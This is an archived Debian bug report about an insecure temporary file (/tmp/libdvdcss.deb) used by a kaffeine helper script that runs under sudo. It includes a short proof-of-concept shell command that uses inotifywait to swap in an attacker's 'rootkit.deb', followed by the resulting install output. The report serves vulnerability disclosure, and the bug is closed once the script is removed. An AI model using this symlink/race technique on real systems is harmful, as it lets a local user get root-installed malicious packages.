Debian Bug report logs - #554772 insecure temporary file /tmp/libdvdcss.deb

version graph

Package: kaffeine; Maintainer for kaffeine is Debian KDE Extras Team <>; Source for kaffeine is src:kaffeine.

Reported by: Timo Juhani Lindfors <>

Date: Fri, 6 Nov 2009 12:42:01 UTC

Severity: normal

Tags: security

Found in version kaffeine/0.8.7-1

Fixed in version 1.0-1

Done: Petter Reinholdtsen <>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to, Debian KDE Extras Team <>:
Bug#554772; Package kaffeine. (Fri, 06 Nov 2009 12:42:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Timo Juhani Lindfors <>:
New Bug report received and forwarded. Copy sent to Debian KDE Extras Team <>. (Fri, 06 Nov 2009 12:42:04 GMT) Full text and rfc822 format available.

Message #5 received at (full text, mbox):

From: Timo Juhani Lindfors <>
To: Debian Bug Tracking System <>
Subject: insecure temporary file /tmp/libdvdcss.deb
Date: Fri, 06 Nov 2009 14:09:54 +0200
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/
--2009-11-06 13:54:46--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...

-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information

Reply sent to Petter Reinholdtsen <>:
You have taken responsibility. (Mon, 09 Aug 2010 13:33:05 GMT) Full text and rfc822 format available.

Notification sent to Timo Juhani Lindfors <>:
Bug acknowledged by developer. (Mon, 09 Aug 2010 13:33:05 GMT) Full text and rfc822 format available.

Message #10 received at (full text, mbox):

From: Petter Reinholdtsen <>
Subject: Re: insecure temporary file /tmp/libdvdcss.deb
Date: Mon, 09 Aug 2010 15:30:48 +0200
Version: 1.0-1

I had a look in version 1.0-1 in testing, and the
/usr/share/doc/kaffeine/ no longer exist in the package.
Because of this, I believe this bug can be closed.

Did not find anything about its removal in the debian changelog, so I
do not know which in version it was taken away.

Happy hacking,
Petter Reinholdtsen

Bug archived. Request was from Debbugs Internal Request <> to (Tue, 07 Sep 2010 07:35:37 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.

Debian bug tracking system administrator <>. Last modified: Fri Apr 18 10:37:33 2014; Machine Name:

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.